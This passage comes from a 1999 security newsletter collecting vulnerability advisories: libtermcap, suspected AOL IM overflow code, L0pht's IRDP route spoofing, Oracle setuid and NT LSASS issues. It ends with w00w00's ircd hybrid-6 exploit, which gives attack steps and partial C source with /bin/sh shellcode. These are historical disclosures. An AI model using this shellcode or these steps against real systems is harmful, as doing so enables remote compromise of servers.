ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-2.0.8-15.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-devel-2.0.8-15.sparc.rpm


Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/libtermcap-2.0.8-15.src.rpm



7. Problem description:


A buffer overflow existed in libtermcap's tgetent() function,
which could cause the user to execute arbitrary code if they
were able to supply their own termcap file.


Under Red Hat Linux 5.2 and 4.2, this could lead to local users
gaining root privileges, as xterm (as well as other possibly
setuid programs) are linked against libtermcap. Under Red Hat
Linux 6.0, xterm is not setuid root.


Thanks go to Kevin Vajk and the Linux Security Audit team for
noting and providing a fix for this vulnerability.


8. Solution:


For each RPM for your particular architecture, run:


rpm -Uvh <filename>


where filename is the name of the RPM.


9. Verification:


MD5 sum Package Name
--------------------------------------------------------------------------
31b5612edbb97c66600ac65c81c85fc2 i386/libtermcap-2.0.8-14.4.2.i386.rpm
8c26efd7648e92f23e9d2b5e7f48d3a4 i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm
e6a3cb5ad06d6b64a40321b01d18931b alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
15c288bd178504542be3b2cee077713a alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm
8fb7ce4743c14b4163c4871dada51b63 sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
bc7a74a44201b37fa6cf3515bd20a2bd sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm
eb117c8f9f926b7fe75f6ebbdf3d2a6b SRPMS/libtermcap-2.0.8-14.4.2.src.rpm


9811a7c7665a18a46e9c876163628ba6 i386/libtermcap-2.0.8-14.5.2.i386.rpm
91248a539ee5fb708d194403c61ee14c i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm
50a9dcb2fea451b03b743c46ea478418 alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
a98bbcd7a3e8ab0b41983318aea5e919 alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm
4c2f8d832512fabbe5dbcb89fc782159 sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
b65b6267eed90d8149a9e52462b3cf10 sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm
19caa6ab708d3a3f6af8eddafb5f53f2 SRPMS/libtermcap-2.0.8-14.5.2.src.rpm


4995cf0a7c181abe56565d82f12c7819 i386/libtermcap-2.0.8-15.i386.rpm
59d18de3f22abe5674575961b1390177 i386/libtermcap-devel-2.0.8-15.i386.rpm
611cdfb7f167242e7d3b2eaac866705a alpha/libtermcap-2.0.8-15.alpha.rpm
76098235237b5f051ad1266193d7b259 alpha/libtermcap-devel-2.0.8-15.alpha.rpm
846ad7a73b25d3eceab1949322337e14 sparc/libtermcap-2.0.8-15.sparc.rpm
6ddde808ec8b5bc7960851ef3188a6dd sparc/libtermcap-devel-2.0.8-15.sparc.rpm
6a29851494601540d642ff557bd590d6 SRPMS/libtermcap-2.0.8-15.src.rpm


These packages are PGP signed by Red Hat Inc. for security. Our key
is available at:


http://www.redhat.com/corp/contact.html


You can verify each package with the following command:


rpm --checksig <filename>


If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:


rpm --checksig --nopgp <filename>


10. References:

@HWA

69.0 Possible AOL IM buffer overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
Possible Buffer Overflow in AOL Instant Messenger
------------------------------------------------------------
Robert Graham
http://www.robertgraham.com/pubs/aol-exploit/



It appears to me that AOL might be running a buffer-overflow
exploit against their own clients.



BEFORE DOING ANYTHING ELSE: log onto AOL Instant Messaging and
take a trace of it with NetMon/tcpdump/Sniffer/etc. If this is
really happening, then AOL will likely fix it soon.



DETAILS
------------------------------------------------------------


Last friday I read the following in the NYTimes:
http://www.nytimes.com/library/tech/99/08/biztech/articles/13soft.html


This story brings up the implication that America Online might
be running a "buffer-overflow exploit" on in its own users.
They have already made 13 changes to their server code in
the past few weeks in order to stop Microsoft's clones from
working, so this may be yet another attempt.


According to whay I see, it appears to me that this implication
is correct. I see something that looks a lot like a buffer overflow
exploit when sniffing the connection between the client and AOL's servers.


You can reproduce this yourself:


1. log onto AOL Instant Messenger with the latest client that
comes with Communicator version WIN32 2.0.912, aka 2.0N.
(Click on [File/Help/Report a bug] to get the real version).


2. take a packet trace of the login procedures (I use NetMon).


3. look for the frame that I describe below.


4. copy/paste the frame data into the C program as I demonstrate
below.


5. step through the code in the debugger and disassemble it



THE PACKET
------------------------------------------------------------


AOL has removed their documentation from the Internet recently.
I had to download the GAIM (AIM client for Linux) source
code to figure things out.


A TCP connection is used. The format for each request/response
in the login process is:


byte[0] = 0x2a
byte[1] = 0x02 (type = 2 =login)
byte[2-3] = sequence number
byte[4-5] = length
byte[6-7] = type
byte[8-9] = subtype


However, multiple requests/responses can be queued into
a single packet. Following is the entire TCP packet I received
from the AOL server to my client:


00000000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
00000010 01 90 35 2A 40 00 7F 06 AF 73 0A 00 00 02 0A 00 ..5*@...s......
00000020 01 C9 04 38 0D 7F 25 F8 E3 A3 0C 19 A5 14 50 18 ...8.%.......P.
00000030 6E B5 4C E2 00 00/2A 02 31 F8 00 0C 00 0B 00 02 n.L...*.1.......
00000040 00 00 80 A2 F1 D5 04 B0/2A 02 31 F9 01 28 00 01 ........*.1..(..
00000050 00 13 00 00 80 A2 F1 D6 00 FF 00 0B 01 18*83*C4 ................
00000060 10 4F 8D 94 24 E4 FE FF FF 8B EC 03 AA F8 00 00 .O..$...........
00000070 00 90 90 90 90 8B 82 F0 00 00 00 8B 00 89 82 4E ...............N
00000080 00 00 00 8B 4D 04 03 8A F4 00 00 00 8D 82 42 00 ....M.........B.
00000090 00 00 89 45 10 B8 10 00 00 00 89 45 0C C9 FF E1 ...E.......E....
000000A0 00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 ................
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 ................
00000150 08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 ..)...D.........
00000160 00 00 08 01 00 00 00 00 00 00 90 47 40 00 F8*E9*...........G@...
00000170 EA FE FF FF 00 00/2A 02 31 FA 00 22 00 01 00 13 ......*.1.."....
00000180 00 00 80 A2 F1 D7 00 04 00 0B 00 12 68 74 74 70 ............http
00000190 3A 2F 2F 77 77 77 2E 61 6F 6C 2E 63 6F 6D ://www.aol.com



There are three AIM segments in this packet, which I've
marked with slashes in the above decode. (Remember that
TCP is a stream based protocol, so application protocols
have to figure out their own boundaries, and you often
see multiple segments in a single TCP packet). The
second segment is of interest here, as marked by
the slashes.


It seems like the first byte of the embedded code
starts at the byte with the value 0x83 at offset 0x53
However, this isn't the buffer overflow, but the start of the
buffer itself. Immediately proceeding this is what appears to
be a length field. I'm thinking they only allow for a max
length of 256 (0x100), but the length field has an
extra 0x18 bytes. So if we go 256 bytes into the buffer,
we get some more stuff that looks like code.


I haven't analyzed all this stuff, but it appears that at
the end of the overflow section, it jumps back to the start
of the buffer that contains the code of the exploit.
[You only get so much wriggle room where you overflow,
because the more you overflow, the more of the stack you
overwrite; so the overflowed section has to be as small
as possible, and jump backwards to actually run something].



THE DECODE
------------------------------------------------------------


In this section, I have done a decode of all the bytes
in the segment. To the left are the original bytes,
to the right is either the protocol interpretation
or the disassembled output. These bytes are
in the same order as in the original packet.


2A 02 parse of logon sequence
31 F9 sequence number
01 28 length of this segment
00 01 00 13 type/subtype field of this packet
00 00 80 A2 F1 D6 00 FF 00 0B unknown data
01 18 length of data field


83 C4 10 add esp,10h
4F dec edi
8D 94 24 E4 FE FF FF lea edx,dword ptr [esp-11Ch]
8B EC mov ebp,esp
03 AA F8 00 00 00 add ebp,dword ptr [edx+0F8h]
90 nop
90 nop
90 nop
90 nop
8B 82 F0 00 00 00 mov eax,dword ptr [edx+0F0h]
8B 00 mov eax,dword ptr [eax]
89 82 4E 00 00 00 mov dword ptr [edx+4Eh],eax
8B 4D 04 mov ecx,dword ptr [ebp+4]
03 8A F4 00 00 00 add ecx,dword ptr [edx+0F4h]
8D 82 42 00 00 00 lea eax,dword ptr [edx+42h]
89 45 10 mov dword ptr [ebp+10h],eax
B8 10 00 00 00 mov eax,10h
89 45 0C mov dword ptr [ebp+0Ch],eax
C9 leave
FF E1 jmp ecx


00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 filler
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 block
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 that
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 doesn't
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 mean
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 much
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 start of
08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 overflow
00 00 08 01 00 00 00 00 00 00
90 47 40 00 jump address?
F8 unknown


E9 EA FE FF FF jmp back_to_start_of_buffer


00 00


You'll notice that there appears to be other code that
I haven't disassembled. I would have to second-guess
the original source, and I don't quite feel like it.


How to disassemble this? The easiest way is simply
to paste the data bytes into a program and RUN the code.


In theory, you could create a sample program that would
actually run this code completely without crashing
but that would take A LOT of effort.



THE CODE TO TEST IT
------------------------------------------------------------
*/


/* The data from the packet, starting at where I believe the data field
* begins.*/
unsigned char packet[] = {0x83, 0xC4,
0x10, 0x4F, 0x8D, 0x94, 0x24, 0xE4, 0xFE, 0xFF,
0xFF, 0x8B, 0xEC, 0x03, 0xAA, 0xF8, 0x00, 0x00,
0x00, 0x90, 0x90, 0x90, 0x90, 0x8B, 0x82, 0xF0,
0x00, 0x00, 0x00, 0x8B, 0x00, 0x89, 0x82, 0x4E,
0x00, 0x00, 0x00, 0x8B, 0x4D, 0x04, 0x03, 0x8A,
0xF4, 0x00, 0x00, 0x00, 0x8D, 0x82, 0x42, 0x00,
0x00, 0x00, 0x89, 0x45, 0x10, 0xB8, 0x10, 0x00,
0x00, 0x00, 0x89, 0x45, 0x0C, 0xC9, 0xFF, 0xE1,
0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x19, 0x10,
0x08, 0x11, 0x29, 0xEC, 0xFF, 0xFF, 0x44, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00,
0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x90, 0x47, 0x40, 0x00, 0xF8, 0xE9,
0xEA, 0xFE, 0xFF, 0xFF, 0x00, 0x00, 0x2A, 0x02,
0x31, 0xFA, 0x00, 0x22, 0x00, 0x01, 0x00, 0x13,
0x00, 0x00, 0x80, 0xA2, 0xF1, 0xD7, 0x00, 0x04,
0x00, 0x0B, 0x00, 0x12, 0x68, 0x74, 0x74, 0x70,
0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x61,
0x6F, 0x6C, 0x2E, 0x63, 0x6F, 0x6D};


/* Function point that will point to the buffer above */
void (*foo)();


int main()
{
/* Set to the point where it overflows (256-characters in),
* then add an offset to the jmp instruction that jumps back
* to the begining */
foo = packet+256+0x11;


/* In MS DevStudio, put a break point here, and then turn on
* disassembly mode [View/Debug Windows/Disassembly]. This will
* allow you to single step each assembly intruction, and will
* disassemble them for you. Also, turn on view of the original
* bytes by righ-hand-mouse-clicking on the disassembly and
* selecting [Code Bytes].
*/
foo();


return 0;
}

@HWA

70.0 L0pht security advisory:Attackers can remotely add default route entries
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[begin]--
L0pht Security Advisory


Release date: August 11, 1999
Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b
Windows98, Windows98se and Sun Microsystems
SunOS & Solaris operating systems.
Severity: Attackers can remotely add default route entries
on the victims host.
Status: Microsoft contacted, fix provided.
Author: sili@l0pht.com
URL: http://www.L0pht.com/advisories.html
Source code: http://www.l0pht.com/advisories/rdp.tar.gz
code written by Silicosis & Mudge



I. Problem
----------


The ICMP Router Discovery Protocol (IRDP) comes enabled by default on
DHCP clients that are running Microsoft Windows95 (w/winsock2),
Windows95b, Windows98, Windows98se, and Windows2000 machines. By
spoofing IRDP Router Advertisements, an attacker can remotely add default
route entries on a remote system. The default route entry added by the
attacker will be preferred over the default route obtained from the DHCP
server. While Windows2000 does indeed have IRDP enabled by default, it
less vulnerable as it is impossible to give it a route that is preferred
over the default route obtained via DHCP.


SunOS systems will also intentionally use IRDP under specific
conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started
if the following conditions are met:


. The system is a host, not a router.
. The system did not learn a default gateway from a
DHCP server.
. The system does not have any static routes.
. The system does not have a valid /etc/defaultrouter
file.


It should be noted that the important point of this advisory is not
that ICMP Router Solicitation and Advertisement packets have no
authentication properties. Yes, this is a problem but it has long been
known. The dangerous aspect comes in various MS platforms enabling
this protocol and believing it _even when the DHCP setup specifies
not to use IRDP (dhcp option #31) (ie the operating system does this even
though you believe you are telling it NOT TO).


The tool provided with this advisory is the basis of what would
be used for everything from web page hacks, stealing credentials,
modifying or altering data, etc. involving vulnerable systems.
We believe most cable modem DHCP clients and large internal
organizations are at risk.


II. Risks
---------


The ICMP Router Discovery Protocol does not have any form of
authentication, making it impossible for end hosts to tell whether or not
the information they receive is valid. Because of this, attackers
can perform a number of attacks:


Passive monitoring: In a switched environment, an attacker
can use this to re-route the outbound traffic of
vulnerable systems through them. This will allow
them to monitor or record one side of the
conversation.

* For this to work, and attacker must be on the
* same network as the victim.


Man in the Middle: Taking the above attack to the next level, the
attacker would also be able to modify any of the
outgoing traffic or play man in the middle.


By sitting in the middle, the attacker can act as
a proxy between the victim and the end host. The
victim, while thinking that they are connected directly
to the end host, they are actually connected to the
attacker, and the attacker is connected to the end
host and is feeding the information through. If
the connection is to a secure webserver that uses SSL,
by sitting in the middle, the attacker would be able
to intercept the traffic, unencrypted.


A good example of this risk is on-line banking;
an attacker playing man-in-the-middle would be able
to intercept all of the banking information that
is relayed, without the victim's knowledge.
This is just a generic oversimplified scenario,
there are obvious issues with certificates that
the attacker would have to deal with if
attempting this scenario.

* For this to work, and attacker must be on the
* same network as the victim.


Denial of Service: Remote attackers can spoof these ICMP packets and
remotely add bad default-route entries into a
victims routing table. Because the victim's
system would be forwarding the frames to the
wrong address, it will be unable to reach other
networks.


Unfortunately, DHCP has quickly become popular and is
relied upon in most companies. In some cases, such as
cable & *DSL modems, users are required to use DHCP.


Because of the large number of vulnerable systems,
and the fact that this attack will penetrate firewalls
that do not stop incoming ICMP packets, this Denial
of Service attack can become quite severe.



It should be noted that the above attacks are documented in Section 7,
of RFC 1256. However, the RFC states states that the attacks are
launched by an attacker on the same network as the victim. In the Denial
of Service attack, this is not the case; an attacker can spoof IRDP
packets and corrupt the routing tables on systems that are on remote
networks.


While these attacks are not new, the fact that Windows95/98 DHCP
clients have been vulnerable for years, is. On systems running SunOS &
Solaris, it is easy to find documentation on IRDP by looking at the
startup scripts or manpages. On Windows95/98, however, information
has only become recently available in the Knowledge Bank.



III. Technical Details
----------------------


Upon startup, a system running MS Windows95/98 will always send 3 ICMP
Router Solicitation packets to the 224.0.0.2 multicast address. If the
machine is NOT configured as a DHCP client, it ignores any Router
Advertisements sent back to the host.


However, if the Windows machine is configured as a DHCP client, any
Router Advertisements sent to the machine will be accepted and processed.
Once an Advertisement is received, Windows checks to see how many Gateway
entries the packet contains. If the packet contains only 1 entry, it
checks to make sure the IP source address of the Advertisement is inside
the hosts subnet. If it is, the Router Address entry inside the
advertisement is checked to see that it is also within the host's subnet.
If so, a new default route entry is added. If the address is outside the
subnet, it the advertisement is silently ignored.


If a host receives a Router Advertisment that contains 2 or more Router
Addresses, the host will processes the packet even though the IP source
address is not local. If the host finds a Router Address inside the
advertisement that is inside the host's subnet, it will add a default
route entry for it.


Because the host does not care about the IP source address of the
Advertisement as long as it has more than one entry, attackers can now
create bogus IRDP packets that will bypass anti-spoofing filters.


Before the host can add a new default route entry, it has to determine
the route metric. On Windows95/98, normal default route entries obtained
from a DHCP server have a metric of 1. In order to determine the metric
for the default route entry obtained via IRDP, the Windows host subtracts
the Advertisement's Preference value from 1000. By creating an ICMP
Router Advertisement with a preference of 1000, the default gateway route
added will have a metric of 0, making it the preferred default route.


By adjusting the Lifetime value in the advertisement, an attacker can
adjust how many seconds the gateways are valid for.


DHCP Vendor Option #31, "Perform Router Discovery" has no effect on
disabling this. If you configure your DHCP server to implicitly disable
Router Discovery, the vulnerable Window95/98 hosts will ignore this, and
continue to update their routing tables with information gleemed via
IRDP.


IV. Fixes / Work-arounds
------------------------


Firewall / Routers:
Block all ICMP Type 9 & Type 10 packets. This should protect
against remote Denial of Service attacks.


Windows95/98:

The Microsoft Knowledge Base contains an article that gives info
on how to disable IRDP. It can be found at:


http://support.microsoft.com/support/kb/articles/q216/1/41.asp

Brief Summary of article:


IRDP can be disabled manually by adding "PerformRouterDiscovery"
value name and setting it to a dword value of 0, under the
following registry key(s):


HKLM\System\CurrentControlSet\Services\Class\NetTrans\####


Where #### is the binding for TCP/IP. More than one TCP/IP
binding may exist.


Solaris:

Configure your host to obtain a default gateway through DHCP,
static routes, or via the /etc/defaultrouter file. For more
information on IRDP refer to in.rdisc's man-page.



V. Detection
-------------


L0pht has released a NFR Intrusion Detection Module to detect both
Router Solicitations and Advertisements. You can find it at:
http://www.l0pht.com/NFR


NFR information can be found at http://www.nfr.net



VI. Source Code
-----------


L0pht is making available Proof-of-Concept code that will let individuals
test their systems & firewalls.


The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz


Usage is fairly straight forward:


Usage: rdp -v -l -s -d <delay> -p <pref> -t <lifetime> -i <dev>
-S <src> -D <dst> -R <rtr> -r <optional 2nd rtr>


-v verbose
-l listen mode
-s send mode
-d <delay time between sending packets>
-n <number of rdp packets to send>
-I <ID value to place in IP packet>
-p <preference level>
-t <lifetime>
-i <interface to use for sniffing>
-S <source address to put in outgoing rdp packet>
-D <destination address to put in outgoing rdp packet>
-R <router address to advertise in rdp packet>
-r <optional 2nd router address to advertise in rdp packet>



Misc software notes:


Listen Mode: Software listens for ICMP Router Solicitations. If the
'-s' flag is specified as well, the software will answer
the Solicitations with ICMP Router Advertisements.


Preference: If the preference is not specified, it will use a default
of 1000, which will give the default route a metric of 0
on affected Windows systems.


2nd Router Addr: By using the '-r' flag and specifying a second router address
entry, the packet can contain a bogus source address and still
be processed for correct gateway entries by the

@HWA

71.0 Setuid problem in Oracle
~~~~~~~~~~~~~~~~~~~~~~~~~

Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
Message-ID: <19990817092232.B7591@securityfocus.com>
Date: Tue, 17 Aug 1999 09:22:32 -0700
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
Subject: Security Bug in Oracle
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Length: 1179



Subject: Security Bug in Oracle
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Length: 1179



Sender: jason.axley@attws.com
Subject: Security Bug in Oracle


---------- Forwarded message ----------
Date: Mon, 16 Aug 1999 23:51:53 +0200
From: Gilles PARC <gparc@online.fr>
Subject: Security Bug in Oracle


Hi Listers,


I discover a new security problem with Oracle on Unix.
Once again, it's with a setuid program.


Do not confuse with a similar problem corrected
by ORACLE some month ago with a patch called setuid_patch.sh.


NEW PROBLEM :


if you have installed Oracle Intelligent agent, you will find in
$ORACLE_HOME/bin a program called dbsnmp.
This program is setuid root and was DELIBERATELY EXCLUDED
by Oracle in the forementioned patch.


The security hole resides in the fact that this program executes
a tcl script ( nmiconf.tcl ) located by default in
$ORACLE_HOME/network/agent/config.


Needless to say that you can easily bypass this default and have
your own malicious nmiconf.tcl script run under root privileges.


I verify this on HP-UX 10.20 with Oracle 7.3.3 and 8.0.4.3
on AIX 4.3 with Oracle 8.0.5.1
But it's probably Unix generic.


Regards


Gilles Parc
Email : gparc@mail.dotcom.fr


carpe diem !!


----- End forwarded message -----


--
Elias Levy
Security Focus
http://www.securityfocus.com/

@HWA

72.0 Vulnerability In LSA on Windows NT SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



----- Forwarded message from "Galipeau, William" <William.Galipeau@FMR.COM> -----


Date: Thu, 12 Aug 1999 17:28:48 -0400
From: "Galipeau, William" <William.Galipeau@FMR.COM>
Subject: FW: Vulnerability In LSA on Windows NT SP5
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM


I inadvertently sent this to the wrong address. My apologies.


-----Original Message-----
From: Galipeau, William
Sent: Thursday, August 12, 1999 10:15 AM
To: russ.cooper@rc.on.ca
Subject: Vulnerablity In LSA on Windows NT SP5



Russ,
A few months ago I found a vulnerability in NT 4.0 configured with SP5.
I downloaded a trial copy of Network Associates Cyber Cop version 5.0.
I ran a scan using all the Denial of Service based attack options. All
failed but one: the "Windows NT- LSASS.EXE Denial of Service attack."
When you run a scan on a NT 4.0 machine configured with SP5 (with or
without the LSA3 hot fix) utilizing this option, the target machine will
lock, not allowing users to authenticate to the server remotely or
locally. The only way to correct the problem is to physically reboot
the server. Also, to make matters worse, the audit logs on the target
server do not illustrate where the attacks were launched from. Because
Cyber Cop allows you to run this scan on any IP or any host of IPs, an
intruder could attack a large base of servers in a relatively short
amount of time without leaving a reliable audit trail.
I reported this issue to Microsoft on 6/23/99 (I have an incident
number). I have been following up with Microsoft, but they have been
reluctant to provide much detail on the issue. Hopefully you can help
motivate them.
Thanks


----- End forwarded message -----

@HWA

73.0 w00w00's efnet ircd advisory (exploit included)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[http://www.w00w00.org, comments to shok@dataforce.net]


SUMMARY
efnet ircd hybrid-6 (up to beta 58) have a vulnerability that can allow
remote access to the irc server. In most cases, you'll gain privileges of
the 'irc' user.


COMMENTS
This vulnerability was discovered by jduck and stranjer of w00w00 at
least 2 months ago. After discussing the vulnerability, it was reported
to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have
been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable
irc servers or they didn't take these 2 months to fix themselves (note:
we didn't wait that long on purpose.. we were just sidetracked with a
million other things).


DESCRIPTION
The vulnerability is in the invite handling code (m_invite). In a
channels with operators (ops) and modes +pi (paranoid + invite-only), a
channel invitation is reported to all other operators. The buffer used to
store the invitation notice can overflow its boundaries by up to 15
bytes.


Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars


Note: client 1 and client 3 should _not_ be from the same host. With our
exploit, client 3 (compile/run hostname.c) first, then compile/run
ircdexp.c.


Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net), because
it allows shellcode chars in hostname


Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']


Here, EIP = 0x41414141 (AAAA). The other registers are negligable.
The hostlen is actually 63 bytes, but for this specific overflow, EIP is
overwritten at buf[54-58].


We have to take stdout/stdin descriptors into consideration. We are very
limited in size (only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode, dropped
exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the
first argument passed to m_invite). Since we only have 54 bytes to work
with, we can't fit code in to close stdout and dup cptr->fd, so output
will be sent to whatever terminald ircd was started from. If you do not
wish for the output to be seen, redirect everything (via '>') /dev/null.


As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your shellcode as a
hostname in response to a DNS query (idea from nyt).


Option #2 is the approach we will take (hostname.c generates the shellcode
we'll use). This will work fine as long as you IP/hostname hasn't already
been cached. Because these "fake binds" are pretty popular (or have been
in the past), they should be easy to come by and are outside the scope of
this advisory.


So full steps are, client with the spoofed hostname, connect to a ComStud
ircd server (such as irc.prison.net), another client join the arbitrary
client, and another client join the target ircd hybrid-6 server (such as
irc.arpa.com). Once the channel is +pi (and your channel, ident,
username, etc. all the right length), invite the client with the spoofed
hostname. Fine-tune until you have root.


Thanks to: stranjer and jduck for their input and discovery of this
vulnerability.


People that deserve hellos: Mike (mike@eEye.com), vacuum
(vacuum@technotronic.com), awr (andrewr@rot26.net), dmess0r
(dmessor@el8.org).


-- Matt Conover (Shok) & w00w00 Security Team

invitee: (hostname.c)

/*
* ircd hybrid-6 exploit (invitee side)
* Matt Conover (Shok) & w00w00 Security Team
*
* This is used to generate the shellcoded hostname, which is used to
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>

#define ERROR -1

#define OFFSET 0
#define HOSTLEN 59 /* this is the just the right len to overwrite eip */

unsigned long getesp();

/*
* Linux x86 shellcode, for a one-sided (input only) shell
* Shellcode close's and dup's stdin to your ircd sockfd, allowing
* you to give input. If we had more room for shellcode, we could make it
* a full duplex shell (two-sided). Unless you redirect output, it will
* be sent to the terminal that ran ircd.
*/
char shellcode[] =
"\xeb\x28\x5e\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x8b\x7e\x0d\x8a\x5f\x38"
"\xb0\x29\xcd\x80\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh";

/* --------------------------------------- */

unsigned long getesp()
{
__asm__("movl %esp,%eax"); /* return value stored in %eax with C */
}

int main(int argc, char **argv)
{
FILE *filefd;
char *argstr, *buf, *bufptr;

long addr;
int i, bufsize = HOSTLEN, offset = OFFSET;

if (argc > 3)
{
fprintf(stderr, "Usage: %s [bufsize] [offset]\n", argv[0]);
exit(ERROR);
}

if (argc == 2) bufsize = atoi(argv[2]);
if (argc == 3) offset = atoi(argv[3]);

if (bufsize < HOSTLEN)
{
printf("bufsize too small.. setting to minimum bufsize (%d)\n",
HOSTLEN);

bufsize = HOSTLEN;
}

buf = malloc(bufsize+1);
if (buf == NULL)
{
fprintf(stderr, "Error malloc'ing memory: %s\n", strerror(errno));
exit(ERROR);
}

addr = getesp() - offset;

printf("stack ptr (0x%lx) - offset (%d) = 0x%lx\n",
addr - offset, offset, addr);

bufptr = buf;

i = bufsize - (strlen(shellcode) + 5), memset(buf, 0x90, i);
bufptr = buf + i, memcpy(bufptr, shellcode, strlen(shellcode));

bufptr = buf + strlen(shellcode) + i, *bufptr++ = '.';
memcpy(bufptr, &addr, sizeof(addr));

buf[bufsize] = '\0';

